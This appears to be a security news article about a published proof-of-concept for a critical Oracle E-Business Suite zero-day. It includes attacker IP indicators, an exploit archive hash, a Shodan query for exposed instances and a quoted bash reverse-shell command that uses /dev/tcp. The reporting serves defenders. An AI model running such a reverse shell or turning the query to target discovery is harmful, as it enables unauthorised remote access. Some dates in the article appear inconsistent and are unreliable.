HomeSecurityPoC Exploit published for zero-day in Oracle E-Business Suite

PoC Exploit published for zero-day in Oracle E-Business Suite

A critical zero-day vulnerability in Oracle E-Business Suite has emerged as a significant threat to enterprise environments, with proof-of-concept (PoC) exploit code now publicly available.

See also: Oracle confirms hackers are targeting E-Business Suite data

Oracle E-Business Suite

The CVE-2025-61882 poses a serious security risk, achieving a maximum CVSS 3.1 score of 9.8 and allowing remote code execution without authentication in many versions of Oracle E-Business Suite.

The vulnerability affects Oracle E-Business Suite versions 12.2.3 through 12.2.14, specifically targeting the Oracle Concurrent Processing BI Publisher Integration over the HTTP protocol.

Security researchers have identified a flaw that allows unauthenticated remote attackers to execute arbitrary code on vulnerable systems via a network-based exploit with low attack complexity.

Oracle's security advisory highlights the vulnerability's classification as "remotely exploitable without authentication," meaning attackers can exploit network access without requiring valid credentials.

The vulnerability's attack vector uses HTTP communications, with the scope remaining unchanged but providing a high impact on confidentiality, integrity, and availability metrics.

Organizations can identify vulnerabilities using Nuclei that check for the text “E-Business Suite Home Page” while comparing Last-Modified timestamps to October 4, 2025.

See also: Extortion emails claim Oracle E-Business Suite data theft

PoC Exploit published for zero-day in Oracle E-Business Suite
PoC Exploit published for zero-day in Oracle E-Business Suite

The Oracle Critical Security Update for October 2023 serves as a prerequisite for applying required security updates. Systems with modification dates before this threshold indicate unpatched installations that are vulnerable to exploitation.

Active exploitation attempts have been recorded via specific Indicators of Compromise (IOCs), including malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 performing GET and POST activities. Attackers use reverse shell commands such as sh -c /bin/bash -i >& /dev/tcp// 0>&1 to create outbound TCP connections for persistent access.

The analysis reveals malicious objects, including the exploit tool oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploit scripts exp.py and server.py.

These tools show sophisticated attack methodologies that are likely linked to known threat groups, including reports of Scattered Spider, Lapsus$, and Cl0p ransomware operations.

Oracle strongly recommends that all affected E-Business Suite installations be updated immediately, emphasizing that only systems under Premier Support or Extended Support receive security updates.

See also: OpenAI signs deal with Oracle for Project Stargate

Selecting the team

🔒 Protect your privacy with Proton VPN

Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.

  • ✔ No-logs, based in Switzerland (except 14-Eyes)
  • ✔ NetShield: blocks ads, trackers & malicious domains
  • ✔ Covers all devices — free version available
Try Proton VPN for free — 30-day money-back guarantee →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

PoC Exploit published for zero-day in Oracle E-Business Suite

Organizations should implement network monitoring for identified Breach Indicators while conducting comprehensive vulnerability assessments using available detection templates and Shodan targeting html:”OA_HTML” to identify exposed instances.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Absentee Mia
Absentee Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS